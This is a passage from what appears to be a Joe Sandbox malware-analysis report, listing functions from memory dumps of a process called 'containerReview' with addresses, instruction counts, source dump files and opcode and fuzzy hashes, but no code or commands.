                                                                    Function 00007FF84926157B Relevance: .2, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34774636cfc5140392eaeb5b682eabaa7f502d96825116ca6ea9a058adecb6e1
                                                                    • Instruction ID: ad0923d19acf35b760a23bea73b63d801be994a2bcb08e26ef583f30d6deca16
                                                                    • Opcode Fuzzy Hash: 34774636cfc5140392eaeb5b682eabaa7f502d96825116ca6ea9a058adecb6e1
                                                                    • Instruction Fuzzy Hash: 9A71BE30D1D59A9EFBA5EF688855ABCBBB1FF09382F1405B9C01EE7582DE287841C710
                                                                    Function 00007FF8492684AE Relevance: .2, Instructions: 206COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd18d115cba40a891a97a763655252566b4edbc20386d74278a3c0fc651792b9
                                                                    • Instruction ID: 04bebb7e57334a6d8c866e723d629677ea17ee5de59931dd5b3b1f71a943f604
                                                                    • Opcode Fuzzy Hash: fd18d115cba40a891a97a763655252566b4edbc20386d74278a3c0fc651792b9
                                                                    • Instruction Fuzzy Hash: AB71F23090CA8A8FE799EF28D4905B4BBA0FF15341F5441BAD45EC7A87DB28BC51CB91
                                                                    Function 00007FF849265FC5 Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e772e4e93f5959613d86325b4331a1f649750afecb8fa1b425d7b054fc07e48
                                                                    • Instruction ID: c50b39822f6ffd7ddf334475632610c28d8021ba5b057f0623556566645645cf
                                                                    • Opcode Fuzzy Hash: 5e772e4e93f5959613d86325b4331a1f649750afecb8fa1b425d7b054fc07e48
                                                                    • Instruction Fuzzy Hash: 56514E70D099AE9FEBA8DF18C490BB977B1FB58341F1041BAD01EE3691DA356E84CB50
                                                                    Function 00007FF848E608D0 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55371ed6d5d523cc16646992b4ef2aa7aab3fbb4fd3df15af10759e2e91a2d83
                                                                    • Instruction ID: 5f1addfaa6cc4ed6b93da3506d42bf07ce14943cadf937e3d3a179a39d9d3777
                                                                    • Opcode Fuzzy Hash: 55371ed6d5d523cc16646992b4ef2aa7aab3fbb4fd3df15af10759e2e91a2d83
                                                                    • Instruction Fuzzy Hash: 2B414762A4D9656FE708B77CB0992F97781FF853A1F0C45BBD04DCB193CE2868818798
                                                                    Function 00007FF8492650D7 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6789e758996718bd2f6bb8450009d4419e749c8c1de725e89d68a36c5fdbe420
                                                                    • Instruction ID: c7680b0fb871a5329587592be4982cb91e6c1e5af7042e1d9efa3af35cae3569
                                                                    • Opcode Fuzzy Hash: 6789e758996718bd2f6bb8450009d4419e749c8c1de725e89d68a36c5fdbe420
                                                                    • Instruction Fuzzy Hash: AC41A431A0C949CFEB98EF2CC496EB477E1FB68351B0405AAD00EC7582DE25EC41CB81
                                                                    Function 00007FF84926A107 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0064e5e6b4d84fd1af8ec0db5e30799276d9920e45156fedb750ff64520eab1
                                                                    • Instruction ID: cc0c77165d0de52e04ceddd3e6acd6878799bea32ade57f8334d24ecb9ec9b01
                                                                    • Opcode Fuzzy Hash: a0064e5e6b4d84fd1af8ec0db5e30799276d9920e45156fedb750ff64520eab1
                                                                    • Instruction Fuzzy Hash: 1F416131A0C949DFEB98EF28D4A5DB4B3E1FB68351B1401AAD00EC3592CE34E955CB81
                                                                    Function 00007FF84927E95E Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 700eec113b84adc776b18ff0496616b1b740890b8d2ad9e16d791e6ff2854288
                                                                    • Instruction ID: a46ada90430124abac7d2b6a9ee59e9022c5499785cb788ba36c70f49ba2cc71
                                                                    • Opcode Fuzzy Hash: 700eec113b84adc776b18ff0496616b1b740890b8d2ad9e16d791e6ff2854288
                                                                    • Instruction Fuzzy Hash: C8419C31608D59CFDB98EF18D459EB8B7E1EF68710B0541AAD01ED72A2DE20EC44CB91
                                                                    Function 00007FF84926EFE7 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3da926c5d5135c51ad3847f4d27b2496c3dab1854749fc758d1b15cbfdcd570
                                                                    • Instruction ID: 8bcc16414eb898fa90e625cab52fcdfaf4b394becf5bb2d41500a6d2c368b6ba
                                                                    • Opcode Fuzzy Hash: d3da926c5d5135c51ad3847f4d27b2496c3dab1854749fc758d1b15cbfdcd570
                                                                    • Instruction Fuzzy Hash: EC417331A0C9599FDF98EF28D465DA4B3E1FB68360B0445AAD10EC3596DE20EC45CB81
                                                                    Function 00007FF84926A1B1 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39b00086a3c2a31b6de89c546467e4e45c71d8732357a54f43fd3a3862974f41
                                                                    • Instruction ID: 2bc268eed70017445789d06f1a1b333a655d2122c1561ebeb17517e516b61d96
                                                                    • Opcode Fuzzy Hash: 39b00086a3c2a31b6de89c546467e4e45c71d8732357a54f43fd3a3862974f41
                                                                    • Instruction Fuzzy Hash: DA318F31A0CA45CFDB9DEF28C0A5E74B7E1FBA8350B1406A9D05AC7292CE34E941CB81
                                                                    Function 00007FF849265181 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 429ff6e604c94d332e6167023d57e9ac7b30afb0a31c4ea076060cac45fb58fa
                                                                    • Instruction ID: 26c5af75f5993c3d9cb095845597b7eeb87724baf0c310935ee1440a6e2097bf
                                                                    • Opcode Fuzzy Hash: 429ff6e604c94d332e6167023d57e9ac7b30afb0a31c4ea076060cac45fb58fa
                                                                    • Instruction Fuzzy Hash: 3E315E31A0C959DFEB98EF2CC496EB477E1FB68751B0406AAD01AC7192DE25E841CB81
                                                                    Function 00007FF84926511B Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3247d9172efc14fc897e936147479c5a94f2cdeeb7d089224243932ad977df76
                                                                    • Instruction ID: e644b7ee22ae5787fc42b4a5e2ae82176e1228e19d9059fe60afea4fe2857063
                                                                    • Opcode Fuzzy Hash: 3247d9172efc14fc897e936147479c5a94f2cdeeb7d089224243932ad977df76
                                                                    • Instruction Fuzzy Hash: 7B318131A0C94ADFEB98EF28C495EB477E1FB68751B0405A9D00EC7592DE24EC41CB81
                                                                    Function 00007FF84926A14B Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bbd5e5e0d1fb7fd52b747f02371663f036deed53d97de93727d013a0fee34c53
                                                                    • Instruction ID: d1d73471a72f9ed100444ad68d3eea37c63a3a3b51ecb03e460aedb0ef70702d
                                                                    • Opcode Fuzzy Hash: bbd5e5e0d1fb7fd52b747f02371663f036deed53d97de93727d013a0fee34c53
                                                                    • Instruction Fuzzy Hash: 2E31503160C945DFDB98EF28C0A5DB4B7E1FB68350B1445A9D01AC7692CE34E945CB81
                                                                    Function 00007FF849260648 Relevance: .1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad04e3100edc8809c062d4dc7f8bfa96acaedccca0aafc073ffa56de1a87f240
                                                                    • Instruction ID: b64e8cf4c7e0f593e5ce649f23246e8afc7e5a254541c625de7b875323b77247
                                                                    • Opcode Fuzzy Hash: ad04e3100edc8809c062d4dc7f8bfa96acaedccca0aafc073ffa56de1a87f240
                                                                    • Instruction Fuzzy Hash: 9A31D271D9D6DA8FEB56EB6488245AC7FB0FF56341F0804BAC04ADB193CA286C05C711
                                                                    Function 00007FF84926C14D Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 284ceca2775413eb397162d657a985894e660955b5a36442cf1b7b4afe23e2d5
                                                                    • Instruction ID: 3ee14d2f22232a0a5d04c35cfee8f5b100c75a07787ea991ed3ca7e8d61f86de
                                                                    • Opcode Fuzzy Hash: 284ceca2775413eb397162d657a985894e660955b5a36442cf1b7b4afe23e2d5
                                                                    • Instruction Fuzzy Hash: DA313C31E1C95A8FEB58FA5CD4519A8B3A1FF58750B10423AD02ED3685DF2478128B84
                                                                    Function 00007FF849264EE5 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6734ea22d49e1aafec9e7e38a1ce8678c34cdbbe2bbad776ef9b5f7af672bd48
                                                                    • Instruction ID: 62574c5ce2bbada1d0ada8d085bad86b17155afb5a49bceb2e8c96b32491cb9e
                                                                    • Opcode Fuzzy Hash: 6734ea22d49e1aafec9e7e38a1ce8678c34cdbbe2bbad776ef9b5f7af672bd48
                                                                    • Instruction Fuzzy Hash: 5531193091C99ACFFBA8EF5884915BD77B1FF54382F50417AE06ED6981DB38AD408B81
                                                                    Function 00007FF848E60998 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d60976fefd31c1ab3169fd8610aee58126950ee222e0fc1df72755f07a33ebf9
                                                                    • Instruction ID: dc52d827a238826cb507ab51d56c93182611abd88347fccc2294ddcf829a3b13
                                                                    • Opcode Fuzzy Hash: d60976fefd31c1ab3169fd8610aee58126950ee222e0fc1df72755f07a33ebf9
                                                                    • Instruction Fuzzy Hash: 5321F821F1DD595FE798B63C945A67977C3FB993A1F5800B9E40EC32D3DE28AC424284
                                                                    Function 00007FF84926225B Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e22a813855a636fb821455822c56f7fb3e46f00e325293e29551efd4914c8841
                                                                    • Instruction ID: adf0d41ea10b3aaed7f0179005a042ca7d37428dc905c77632d67a83087b3556
                                                                    • Opcode Fuzzy Hash: e22a813855a636fb821455822c56f7fb3e46f00e325293e29551efd4914c8841
                                                                    • Instruction Fuzzy Hash: A9311A31E1C95A8FEB98EE58D4919A9F7E1FF58750F104139D01ED7682DB24AC128B84
                                                                    Function 00007FF84926EDF5 Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3119acb8b828265ba53dec4b415fd602365e850717fc708c8425c80685705c3e
                                                                    • Instruction ID: 4d6d30ce12b08a34842a57fd0000e623f380165d67a45aec35d6e5a314e5bf08
                                                                    • Opcode Fuzzy Hash: 3119acb8b828265ba53dec4b415fd602365e850717fc708c8425c80685705c3e
                                                                    • Instruction Fuzzy Hash: 20313930D1C59ACFFBE8EF5494996BD77B1FF58392F50047AD06EC2981DA3868608B81
                                                                    Function 00007FF84926728B Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abd9bfc623c27c85c9da52d0f1557899fa0eb67c57f2a44fe6c3673ed71807ee
                                                                    • Instruction ID: 592f7967ef1769c195c3469bf662c1c1777f116e494c5c98e09a21412e562c2e
                                                                    • Opcode Fuzzy Hash: abd9bfc623c27c85c9da52d0f1557899fa0eb67c57f2a44fe6c3673ed71807ee
                                                                    • Instruction Fuzzy Hash: 51316D31E1C95A9FEB58EF2CE4919A8F7A1FF94750B10427AD01ED3682DB247C528B84
                                                                    Function 00007FF849260681 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 737652556859debd61884f96b1cabced1b08ddc4ea26eb69c9d1b71d5ead62ae
                                                                    • Instruction ID: ab4ad59d005aef13ba895bded0a386dd636c22059055d7e03991b4f72e5fb286
                                                                    • Opcode Fuzzy Hash: 737652556859debd61884f96b1cabced1b08ddc4ea26eb69c9d1b71d5ead62ae
                                                                    • Instruction Fuzzy Hash: B031BF70D5DADE8FEB55EF68C8505ECBBB0FF59341F0800BAC00AE7192DA286805CB51
                                                                    Function 00007FF849269F15 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1bd397dc0cd4be722eb38c38dc70c190868e178ce014ad3edea087bc01d2035b
                                                                    • Instruction ID: 47ba26c9f9a8c1166ba4158b40df89efe5625e2f1ebd2c4fa6c9f000548b85d5
                                                                    • Opcode Fuzzy Hash: 1bd397dc0cd4be722eb38c38dc70c190868e178ce014ad3edea087bc01d2035b
                                                                    • Instruction Fuzzy Hash: CA315C3490C9AACFEBA8EF5884555BD77B1FF44382F51007AD02EC6991CF396D408781
                                                                    Function 00007FF848E611A1 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0172d2265e3495e95cdf8f132dd535a748f9947ad2b1a553b7a10de4a9f1be05
                                                                    • Instruction ID: 77dd80b625d512a494a0fc47df8703dca0174a433a7add459463824453681947
                                                                    • Opcode Fuzzy Hash: 0172d2265e3495e95cdf8f132dd535a748f9947ad2b1a553b7a10de4a9f1be05
                                                                    • Instruction Fuzzy Hash: D831613090C65A8FDB46FB68C8599B97BF0FF5A350F4505BBC009E72A2DB39A841CB50
                                                                    Function 00007FF849267345 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf5e426c303cef0051680c047d65ee7df03fb827a0064224da25ed45ae0b2e21
                                                                    • Instruction ID: 5838db3574acbdf80fadd8c4dfc6ca26a500fe45ef8f271f72a215114cf81721
                                                                    • Opcode Fuzzy Hash: cf5e426c303cef0051680c047d65ee7df03fb827a0064224da25ed45ae0b2e21
                                                                    • Instruction Fuzzy Hash: F421B432D1CA9A4FFB68EB2864523E8B7D1FF94351F140279C02EC3682EE2869464351
                                                                    Function 00007FF849268E00 Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a97beec7a31354c10b7a7d1771fed090b5e76fb20412cec71269340ecbbb020
                                                                    • Instruction ID: 78889701001d623bbc0b2102874fafd3fa881d754cf2368aa5f86d62389a8f2d
                                                                    • Opcode Fuzzy Hash: 4a97beec7a31354c10b7a7d1771fed090b5e76fb20412cec71269340ecbbb020
                                                                    • Instruction Fuzzy Hash: 9C310B1191C5F68FF739DA1894A45747B51EF9534271846BAE0EA8B8C7C52CAC85C381
                                                                    Function 00007FF849263DD1 Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18cac2ccae6cb83022a1e2d92860a096b8ae122bbbf6d038df200f2e30dd8655
                                                                    • Instruction ID: b92c528c30b08148f8e66095ededfaaccd392c6dad16d97135b31a80bc6f4fe4
                                                                    • Opcode Fuzzy Hash: 18cac2ccae6cb83022a1e2d92860a096b8ae122bbbf6d038df200f2e30dd8655
                                                                    • Instruction Fuzzy Hash: B631491091C5F78EF73A9A1894605B57BA1FF4235271845BAC0EB8B9C7C82CED468391
                                                                    Function 00007FF84926DCE1 Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c702663164fc72883be63de2fc1f17736cb736e3f9ee0ff6866237c6722c3ec
                                                                    • Instruction ID: 9afe673a0ffe79848ae9d65f200b91542cc2ae113bbcc135ac25d6b0e6687e51
                                                                    • Opcode Fuzzy Hash: 0c702663164fc72883be63de2fc1f17736cb736e3f9ee0ff6866237c6722c3ec
                                                                    • Instruction Fuzzy Hash: 5C31D81191C5FB8EF339BB188C606747B65EF52342B184DB9D1968B8DBC8187C41D341
                                                                    Function 00007FF84926C20A Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b009ef65dc72e38edf481f158a93e9a5cd54c9ff9fb7b910584ced11894ab81b
                                                                    • Instruction ID: 6fd8cbc25c8b5286bf2a2652f5515792e921ed8eeb7b92820e526ee22c3b57d5
                                                                    • Opcode Fuzzy Hash: b009ef65dc72e38edf481f158a93e9a5cd54c9ff9fb7b910584ced11894ab81b
                                                                    • Instruction Fuzzy Hash: 5C210731E1C9898FEB6CFBA898522E8B3D1FF54751F14027ED51EC7682EE2868058751
                                                                    Function 00007FF84926B099 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5228a5e5b26af3093be4bd0c401f49c09bf3b3a691c6a0616533bd737fbfcc6d
                                                                    • Instruction ID: d8408e2518d02a764976ae68d2eda7a24cd8244f88638401853f0eaf85aa3c90
                                                                    • Opcode Fuzzy Hash: 5228a5e5b26af3093be4bd0c401f49c09bf3b3a691c6a0616533bd737fbfcc6d
                                                                    • Instruction Fuzzy Hash: 2E31C870E1C95D9FEFA8EF18D495AB9B7B1FB58351F0041BED01EE3691DA3569808B00
                                                                    Function 00007FF8492656D8 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50aa587a922b6b4fcac682b0dff9bc378b3e48047af6c4aa9930d82bfa563ce3
                                                                    • Instruction ID: c59ccca9f009381482f463de93d8f86f66cf6b65ac4d32a49de07f53b6ff7ec7
                                                                    • Opcode Fuzzy Hash: 50aa587a922b6b4fcac682b0dff9bc378b3e48047af6c4aa9930d82bfa563ce3
                                                                    • Instruction Fuzzy Hash: 9B216B30D1C9AEDFEB69EF68D8509EDBBB1FF68341F540079D01AE3291DA25A901CB50
                                                                    Function 00007FF8492611F2 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 712eab8bfce62de8610353ae547bc04fff0074d32ef7a94d128665158e3dcded
                                                                    • Instruction ID: aff086272094d4affd216ec83c60bd315197016959019c48f36797be9da7cf3a
                                                                    • Opcode Fuzzy Hash: 712eab8bfce62de8610353ae547bc04fff0074d32ef7a94d128665158e3dcded
                                                                    • Instruction Fuzzy Hash: 8E21F830E1886D9FDF9CEB58C495AECB7B1FB58341F0041AAD01EE3692DB35AD408B00
                                                                    Function 00007FF84926B0E2 Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf75faf31087f64c9f122f3d797aee1c4fae4188133c9bf3648b788a00914d48
                                                                    • Instruction ID: 0c833c2e69a8d99ffbd7a4a7b06f6eb64981c94cb3744268018a49c0e034d5f2
